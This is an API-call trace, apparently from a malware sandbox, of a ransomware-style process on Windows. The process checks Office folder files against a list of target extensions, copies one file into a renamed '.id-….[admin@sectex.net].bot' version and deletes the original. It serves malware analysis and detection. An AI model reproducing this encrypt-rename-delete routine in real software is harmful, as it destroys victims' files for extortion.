	[0147.111] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0147.111] lstrlenW (lpString=".7z") returned 3
	[0147.111] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0147.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL") returned 60
	[0147.111] lstrlenW (lpString=".dbf") returned 4
	[0147.111] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0147.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL") returned 60
	[0147.111] lstrlenW (lpString=".1cd") returned 4
	[0147.111] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0147.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL") returned 60
	[0147.111] lstrlenW (lpString=".jpg") returned 4
	[0147.111] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0147.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL") returned 60
	[0147.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL") returned 60
	[0147.111] lstrlenW (lpString=".doc") returned 4
	[0147.111] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0147.111] lstrlenW (lpString=".docx") returned 5
	[0147.111] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0147.111] lstrlenW (lpString=".pdf") returned 4
	[0147.111] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0147.111] lstrlenW (lpString=".xls") returned 4
	[0147.111] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0147.111] lstrlenW (lpString=".xlsx") returned 5
	[0147.111] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0147.111] lstrlenW (lpString=".ppt") returned 4
	[0147.111] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0147.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL") returned 60
	[0147.111] lstrlenW (lpString=".zip") returned 4
	[0147.112] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0147.112] lstrlenW (lpString=".rar") returned 4
	[0147.112] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0147.112] lstrlenW (lpString=".bz2") returned 4
	[0147.112] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0147.112] lstrlenW (lpString=".7z") returned 3
	[0147.112] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0147.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL") returned 60
	[0147.112] lstrlenW (lpString=".dbf") returned 4
	[0147.112] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0147.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL") returned 60
	[0147.112] lstrlenW (lpString=".1cd") returned 4
	[0147.112] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0147.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPDSINTL.DLL") returned 60
	[0147.112] lstrlenW (lpString=".jpg") returned 4
	[0147.112] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0147.112] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0147.112] lstrlenW (lpString="IPEDINTL.DLL") returned 12
	[0147.112] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipedintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0147.113] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=883600) returned 1
	[0147.113] CloseHandle (hObject=0x2a0) returned 1
	[0147.113] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipedintl.dll")) returned 0x20
	[0147.113] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipedintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipedintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0147.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL") returned 60
	[0147.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL") returned 60
	[0147.113] lstrlenW (lpString=".doc") returned 4
	[0147.113] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0147.113] lstrlenW (lpString=".docx") returned 5
	[0147.113] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0147.113] lstrlenW (lpString=".pdf") returned 4
	[0147.113] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0147.113] lstrlenW (lpString=".xls") returned 4
	[0147.113] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0147.113] lstrlenW (lpString=".xlsx") returned 5
	[0147.113] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0147.113] lstrlenW (lpString=".ppt") returned 4
	[0147.114] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0147.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL") returned 60
	[0147.114] lstrlenW (lpString=".zip") returned 4
	[0147.114] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0147.114] lstrlenW (lpString=".rar") returned 4
	[0147.114] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0147.114] lstrlenW (lpString=".bz2") returned 4
	[0147.114] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0147.114] lstrlenW (lpString=".7z") returned 3
	[0147.114] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0147.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL") returned 60
	[0147.114] lstrlenW (lpString=".dbf") returned 4
	[0147.114] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0147.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL") returned 60
	[0147.114] lstrlenW (lpString=".1cd") returned 4
	[0147.114] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0147.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL") returned 60
	[0147.114] lstrlenW (lpString=".jpg") returned 4
	[0147.114] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0147.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL") returned 60
	[0147.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL") returned 60
	[0147.114] lstrlenW (lpString=".doc") returned 4
	[0147.114] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0147.114] lstrlenW (lpString=".docx") returned 5
	[0147.114] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0147.114] lstrlenW (lpString=".pdf") returned 4
	[0147.114] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0147.114] lstrlenW (lpString=".xls") returned 4
	[0147.114] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0147.114] lstrlenW (lpString=".xlsx") returned 5
	[0147.114] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0147.115] lstrlenW (lpString=".ppt") returned 4
	[0147.115] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0147.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL") returned 60
	[0147.115] lstrlenW (lpString=".zip") returned 4
	[0147.115] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0147.115] lstrlenW (lpString=".rar") returned 4
	[0147.115] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0147.115] lstrlenW (lpString=".bz2") returned 4
	[0147.115] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0147.115] lstrlenW (lpString=".7z") returned 3
	[0147.115] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0147.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL") returned 60
	[0147.115] lstrlenW (lpString=".dbf") returned 4
	[0147.115] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0147.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL") returned 60
	[0147.115] lstrlenW (lpString=".1cd") returned 4
	[0147.115] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0147.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPEDINTL.DLL") returned 60
	[0147.115] lstrlenW (lpString=".jpg") returned 4
	[0147.115] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0147.115] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0147.115] lstrlenW (lpString="IPOLKINTL.DLL") returned 13
	[0147.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipolkintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0147.116] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=255920) returned 1
	[0147.116] CloseHandle (hObject=0x2a0) returned 1
	[0147.116] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipolkintl.dll")) returned 0x20
	[0147.116] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipolkintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ipolkintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0147.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL") returned 61
	[0147.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL") returned 61
	[0147.116] lstrlenW (lpString=".doc") returned 4
	[0147.117] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0147.117] lstrlenW (lpString=".docx") returned 5
	[0147.117] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0147.117] lstrlenW (lpString=".pdf") returned 4
	[0147.117] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0147.117] lstrlenW (lpString=".xls") returned 4
	[0147.117] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0147.117] lstrlenW (lpString=".xlsx") returned 5
	[0147.117] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0147.117] lstrlenW (lpString=".ppt") returned 4
	[0147.117] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0147.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL") returned 61
	[0147.117] lstrlenW (lpString=".zip") returned 4
	[0147.117] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0147.117] lstrlenW (lpString=".rar") returned 4
	[0147.117] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0147.117] lstrlenW (lpString=".bz2") returned 4
	[0147.117] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0147.117] lstrlenW (lpString=".7z") returned 3
	[0147.117] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0147.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL") returned 61
	[0147.117] lstrlenW (lpString=".dbf") returned 4
	[0147.117] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0147.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL") returned 61
	[0147.117] lstrlenW (lpString=".1cd") returned 4
	[0147.117] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0147.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL") returned 61
	[0147.117] lstrlenW (lpString=".jpg") returned 4
	[0147.117] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0147.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL") returned 61
	[0147.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL") returned 61
	[0147.118] lstrlenW (lpString=".doc") returned 4
	[0147.118] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0147.118] lstrlenW (lpString=".docx") returned 5
	[0147.118] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0147.118] lstrlenW (lpString=".pdf") returned 4
	[0147.118] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0147.118] lstrlenW (lpString=".xls") returned 4
	[0147.118] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0147.118] lstrlenW (lpString=".xlsx") returned 5
	[0147.118] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0147.118] lstrlenW (lpString=".ppt") returned 4
	[0147.118] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0147.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL") returned 61
	[0147.118] lstrlenW (lpString=".zip") returned 4
	[0147.118] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0147.118] lstrlenW (lpString=".rar") returned 4
	[0147.118] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0147.118] lstrlenW (lpString=".bz2") returned 4
	[0147.118] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0147.118] lstrlenW (lpString=".7z") returned 3
	[0147.118] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0147.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL") returned 61
	[0147.118] lstrlenW (lpString=".dbf") returned 4
	[0147.118] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0147.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL") returned 61
	[0147.118] lstrlenW (lpString=".1cd") returned 4
	[0147.118] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0147.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\IPOLKINTL.DLL") returned 61
	[0147.118] lstrlenW (lpString=".jpg") returned 4
	[0147.118] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0147.119] lstrcmpiW (lpString1=".gta", lpString2=".bot") returned 1
	[0147.119] lstrlenW (lpString="Issue Tracking.gta") returned 18
	[0147.119] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\issue tracking.gta"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0147.119] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=249535) returned 1
	[0147.119] CloseHandle (hObject=0x2a0) returned 1
	[0147.119] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\issue tracking.gta")) returned 0x20
	[0147.119] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\issue tracking.gta.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.119] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\issue tracking.gta"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0147.120] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.120] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.120] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\issue tracking.gta.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0147.120] GetLastError () returned 0x0
	[0147.120] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x3cebf, lpOverlapped=0x0) returned 1
	[0147.344] WriteFile (in: hFile=0x3b8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x3cec0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x3cec0, lpOverlapped=0x0) returned 1
	[0147.357] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.357] WriteFile (in: hFile=0x3b8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf8, lpOverlapped=0x0) returned 1
	[0147.357] SetEndOfFile (hFile=0x3b8) returned 1
	[0147.357] CloseHandle (hObject=0x3b8) returned 1
	[0147.357] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.357] SetEndOfFile (hFile=0x2a0) returned 1
	[0147.363] CloseHandle (hObject=0x2a0) returned 1
	[0147.363] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.373] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\issue tracking.gta")) returned 1
	[0147.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta") returned 66
	[0147.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta") returned 66
	[0147.374] lstrlenW (lpString=".doc") returned 4
	[0147.374] lstrcmpiW (lpString1=".doc", lpString2=".gta") returned -1
	[0147.374] lstrlenW (lpString=".docx") returned 5
	[0147.374] lstrcmpiW (lpString1=".docx", lpString2="g.gta") returned -1
	[0147.374] lstrlenW (lpString=".pdf") returned 4
	[0147.374] lstrcmpiW (lpString1=".pdf", lpString2=".gta") returned 1
	[0147.374] lstrlenW (lpString=".xls") returned 4
	[0147.374] lstrcmpiW (lpString1=".xls", lpString2=".gta") returned 1
	[0147.374] lstrlenW (lpString=".xlsx") returned 5
	[0147.374] lstrcmpiW (lpString1=".xlsx", lpString2="g.gta") returned -1
	[0147.374] lstrlenW (lpString=".ppt") returned 4
	[0147.374] lstrcmpiW (lpString1=".ppt", lpString2=".gta") returned 1
	[0147.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta") returned 66
	[0147.374] lstrlenW (lpString=".zip") returned 4
	[0147.374] lstrcmpiW (lpString1=".zip", lpString2=".gta") returned 1
	[0147.374] lstrlenW (lpString=".rar") returned 4
	[0147.374] lstrcmpiW (lpString1=".rar", lpString2=".gta") returned 1
	[0147.374] lstrlenW (lpString=".bz2") returned 4
	[0147.374] lstrcmpiW (lpString1=".bz2", lpString2=".gta") returned -1
	[0147.374] lstrlenW (lpString=".7z") returned 3
	[0147.374] lstrcmpiW (lpString1=".7z", lpString2="gta") returned -1
	[0147.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta") returned 66
	[0147.375] lstrlenW (lpString=".dbf") returned 4
	[0147.375] lstrcmpiW (lpString1=".dbf", lpString2=".gta") returned -1
	[0147.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta") returned 66
	[0147.375] lstrlenW (lpString=".1cd") returned 4
	[0147.375] lstrcmpiW (lpString1=".1cd", lpString2=".gta") returned -1
	[0147.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta") returned 66
	[0147.375] lstrlenW (lpString=".jpg") returned 4
	[0147.375] lstrcmpiW (lpString1=".jpg", lpString2=".gta") returned 1
	[0147.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta") returned 66
	[0147.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta") returned 66
	[0147.375] lstrlenW (lpString=".doc") returned 4
	[0147.375] lstrcmpiW (lpString1=".doc", lpString2=".gta") returned -1
	[0147.375] lstrlenW (lpString=".docx") returned 5
	[0147.375] lstrcmpiW (lpString1=".docx", lpString2="g.gta") returned -1
	[0147.375] lstrlenW (lpString=".pdf") returned 4
	[0147.375] lstrcmpiW (lpString1=".pdf", lpString2=".gta") returned 1
	[0147.375] lstrlenW (lpString=".xls") returned 4
	[0147.375] lstrcmpiW (lpString1=".xls", lpString2=".gta") returned 1
	[0147.375] lstrlenW (lpString=".xlsx") returned 5
	[0147.375] lstrcmpiW (lpString1=".xlsx", lpString2="g.gta") returned -1
	[0147.375] lstrlenW (lpString=".ppt") returned 4
	[0147.375] lstrcmpiW (lpString1=".ppt", lpString2=".gta") returned 1
	[0147.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta") returned 66
	[0147.375] lstrlenW (lpString=".zip") returned 4
	[0147.375] lstrcmpiW (lpString1=".zip", lpString2=".gta") returned 1
	[0147.375] lstrlenW (lpString=".rar") returned 4
	[0147.375] lstrcmpiW (lpString1=".rar", lpString2=".gta") returned 1
	[0147.375] lstrlenW (lpString=".bz2") returned 4
	[0147.375] lstrcmpiW (lpString1=".bz2", lpString2=".gta") returned -1
	[0147.375] lstrlenW (lpString=".7z") returned 3
	[0147.375] lstrcmpiW (lpString1=".7z", lpString2="gta") returned -1
	[0147.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta") returned 66
	[0147.376] lstrlenW (lpString=".dbf") returned 4
	[0147.376] lstrcmpiW (lpString1=".dbf", lpString2=".gta") returned -1
	[0147.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta") returned 66
	[0147.376] lstrlenW (lpString=".1cd") returned 4
	[0147.376] lstrcmpiW (lpString1=".1cd", lpString2=".gta") returned -1
	[0147.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta") returned 66
	[0147.376] lstrlenW (lpString=".jpg") returned 4
	[0147.376] lstrcmpiW (lpString1=".jpg", lpString2=".gta") returned 1
	[0147.376] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0147.376] lstrlenW (lpString="MAPISHELLR.DLL") returned 14
	[0147.376] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mapishellr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0147.380] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=591832) returned 1
	[0147.381] CloseHandle (hObject=0x2a0) returned 1
	[0147.381] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mapishellr.dll")) returned 0x20
	[0147.387] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mapishellr.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.387] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mapishellr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0147.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL") returned 62
	[0147.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL") returned 62
	[0147.388] lstrlenW (lpString=".doc") returned 4
	[0147.388] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0147.389] lstrlenW (lpString=".docx") returned 5
	[0147.389] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0147.389] lstrlenW (lpString=".pdf") returned 4
	[0147.389] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0147.389] lstrlenW (lpString=".xls") returned 4
	[0147.389] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0147.389] lstrlenW (lpString=".xlsx") returned 5
	[0147.389] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0147.389] lstrlenW (lpString=".ppt") returned 4
	[0147.389] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0147.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL") returned 62
	[0147.389] lstrlenW (lpString=".zip") returned 4
	[0147.389] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0147.389] lstrlenW (lpString=".rar") returned 4
	[0147.389] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0147.389] lstrlenW (lpString=".bz2") returned 4
	[0147.389] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0147.389] lstrlenW (lpString=".7z") returned 3
